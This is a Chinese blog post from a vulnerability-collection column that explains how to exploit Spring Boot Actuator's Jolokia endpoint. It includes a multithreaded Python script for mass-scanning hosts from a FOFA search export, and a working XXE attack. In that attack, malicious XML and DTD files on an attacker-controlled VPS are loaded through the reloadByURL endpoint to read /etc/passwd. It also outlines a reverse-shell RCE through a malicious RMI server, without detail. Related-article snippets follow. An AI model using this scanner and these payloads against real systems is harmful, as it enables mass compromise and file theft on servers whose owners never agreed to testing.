Spring Boot Actuator 漏洞利用

最新推荐文章于 2024-03-09 13:00:00 发布
最新推荐文章于 2024-03-09 13:00:00 发布
阅读量2k 收藏 2
点赞数
分类专栏: 漏洞收录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45427650/article/details/116237445
版权

Spring Boot Actuator 漏洞利用

漏洞检测:

spring存在目录:/jolokia/list
并且返回的json中有“reloadByURL”
关于路径问题:1.x版本的在根路径下注册路由,2.x版本则需要加/actuator/
写个批量脚本检测一下

import threading
import argparse
import requests
import queue

def readfile():
    with open('fofa_spring.txt', 'r') as f:
        for i in f.readlines():
            i = i.strip()
            if i[:4] != 'http':
                i = 'http://' + i
            q.put(i)
        print('文件加载完毕!!!\n')

def writefile(p):
    with open('sucess.txt', 'a') as f:
        f.write(p+'\n')

def check():
    c = q.get()
    try:
        r = requests.get(c+url, timeout=0.5)
        if 'reloadByURL' in r.text and r.status_code == 200:
            print('\033[1;31;40m[+]Yes: \033[0m'+c+url)
            writefile(c+url)
        else:
            r = requests.get(c+url2, timeout=0.5)
            if 'reloadByURL' in r.text and r.status_code == 200:
                print('\033[1;31;40m[+]Yes: \033[0m'+c+url)
                writefile(c + url)
            else:
                print('[-]NO: '+c)
    except:
        pass

def batch():
    while not q.empty():
        check()

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='*********Spring Boot Actuator*********')
    group = parser.add_mutually_exclusive_group()
    group.add_argument("-b", "--batch", action="store_true", help='批量检测当前目录url.txt中的url生成success.txt')
    args = parser.parse_args()
    q = queue.Queue()
    list = []
    url = '/jolokia/list'
    url2 = '/actuator/jolokia/list'

    if args.batch:
        readfile()
        for i in range(10):        #10个线程
            t = threading.Thread(target=batch)
            t.start()

在这里插入图片描述

xxe

vps起web服务:

python3 -m http.server 80

vps放入文件fire.xml 和fire.dtd
fire.xml

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE a [ <!ENTITY % remote SYSTEM "http://vps-ip/fire.dtd">%remote;%int;]>
<a>&trick;</a>

fire.dtd

<!ENTITY % d SYSTEM "file:///etc/passwd"> 
<!ENTITY % int "<!ENTITY trick SYSTEM ':%d;'>">

访问目标网站:

target-ip/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/vps-ip!/fire.xml

成功读取
在这里插入图片描述

reloadByURL RCE

reloadByURL 远程加载xml指定恶意的RMI服务

下载 这个zip 到vps解压 修改里面的EvilRMIServer.java 文件 反弹shell的地址。
pass…

createJNDIRealm RCE

pass…

【+】参考资料

心如熊猫
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
spring boot actuator RCE
问题很多的小明
06-27 2464
搭建漏洞环境: git clone https://github.com/veracode-research/actuator-testbed mvn install 或者 mvn spring-boot:run,如果遇到了报错,多半是因为网络问题导致本地mvn仓库下载不完全导致项目依赖解析出问题,解决办法点这里 本地访问一下: 关于路径问题:1.x版本的在根路径下注册路由,2.x版本则需要加/actuator/ 路径 描述 /autoconfig 提供了一
Spring Boot Actuator 漏洞复现合集
m0_54850467的博客
08-02 1733
SpringBootActuator端点通过JMX和HTTP公开暴露给外界访问,大多数时候我们使用基于HTTP的Actuator端点,因为它们很容易通过浏览器、CURL命令、shell脚本等方式访问。SpringBootActuator未授权访问/dump-显示线程转储(包括堆栈跟踪)/autoconfig-显示自动配置报告/configprops-显示配置属性/trace-显示最后几条HTTP消息(可能包含会话标识符)/logfile-输出日志文件的内容/...
漏洞复现 - - - Springboot未授权访问
最新发布
qq_44005305的博客
03-09 1901
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
Spring Boot Actuator(eureka xstream deserialization RCE)
weixin_50464560的博客
07-14 982
正常访问 运行之后是这个样子 spring 2.x 首先证明目标可以出网 spring 2.x 执行完了刷新以后可以收到请求记录则证明目标机器可以出网,否则不能出网 再访问目标网址(发现网址已经被写入) 执行写入操作 执行刷新操作 此时去服务器看请求记录(如果收到如下请求则证明没有问题,如果没有put则有问题)...
SpringBoot Actuator RCE 漏洞总结
渗透测试研究中心
03-01 2921
一、SpringBoot env 获取* 敏感信息当我们直接访问 springboot 站点时,可以看到某些 password 字段填充了*通过${name} 可以获取明文字段 2. 配置不当导致敏感信息泄露(password 打星号,而 pwd 没有打星号)参考https://mp.weixin.qq.com/s/HmGEYRcf1hSVw9Uu9XHGsA具体实现过程:例如: 我...
关于Spring Boot Actuator漏洞补救方案
qq_39712282的博客
01-30 8221
SpringbootActuator信息泄露漏洞问题
Spring Boot Actuator详解与漏洞利用
做自己喜欢的事,并将其发挥到极致!
08-19 6312
由Pivotal团队提供的全新框架,其设计的目的是用来简化新Spring应用的初始搭建以及开发过程。该框架使用了特定的方式来配置,从而使开发人员不再需要定义样板化的配置。通过这种方式,Spring Boot致力于在蓬勃发展的快速应用开发领域(rapid application development)成为领导者。ActuatorSpring Boot提供的对应用系统的监控和管理。
Spring Boot Actuator未授权访问漏洞利用
热门推荐
Bird&Bird
08-24 5万+
目录一、前言二、端点描述三、漏洞发现四、漏洞利用五、安全措施六、安全建议 一、前言 ActuatorSpring Boot 提供的服务监控和管理中间件。当 Spring Boot 应用程序运行时,它会自动将多个端点注册到路由进程中。而由于对这些端点的错误配置,就有可能导致一些系统信息泄露、XXE、甚至是 RCE 等安全问题。 二、端点描述 官方文档对每个端点的功能进行了描述。 路径 描述 /autoconfig 提供了一份自动配置报告,记录哪些自动配置条件通过了,哪些没通过 /be
Spring Boot Actuator执行器运行原理详解
08-24
主要介绍了Spring Boot Actuator执行器运行原理详解,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
Spring Boot Actuator端点相关原理解析
08-18
主要介绍了Spring Boot Actuator端点相关原理解析,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
Spring Boot Actuator监控端点小结
08-30
主要介绍了Spring Boot Actuator监控端点小结,需要的朋友可以参考下
Spring Boot Actuator监控器配置及使用解析
08-18
主要介绍了Spring Boot Actuator监控器配置及使用解析,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
springboot 使用Spring Boot Actuator监控应用小结
08-28
本篇文章主要介绍了springboot 使用Spring Boot Actuator监控应用小结,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
禅道 11.6版本 后台漏洞 复现和审计
weixin_45427650的博客
04-04 2832
文章目录查看版本漏洞sql注入任意文件读取rce 禅道 11.6版本下载地址 本次复现环境windows 先搞清楚禅道参数的传递方式,进入index.php慢慢看 先发现了这个语句: 这个导致禅道的查看版本信息的漏洞 跟进看一下 查看版本漏洞 复现payload:http://ip/zentao/index.php?mode=getconfig 跟进exportConfig() 文件位置:zentao\framework\router.class.php 调用父类的exportConfig()
SpringCloud CVE_2019_3799--CVE_2020_5410 批量poc
weixin_45427650的博客
04-17 816
import requests import argparse import re CVE_2019_3799_win = r'/aaa/bbb/master/..%252F..%252F..%252F..%252F..%252F..%252Fwindows/win.ini' CVE_2019_3799_linux = r'/foo/default/master/..%252F..%252F..%252F..%252Fetc%252fpasswd' CVE_2020_5410_linux = r'/..
关于Spring Boot Actuator漏洞怎么处理
05-14
Spring Boot ActuatorSpring Boot提供的一个非常强大的端点监控和管理工具,它可以提供应用程序的健康状态、内存使用情况、线程池使用情况等信息。但是,它也存在一些漏洞,比如未授权访问漏洞和信息泄露漏洞等。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值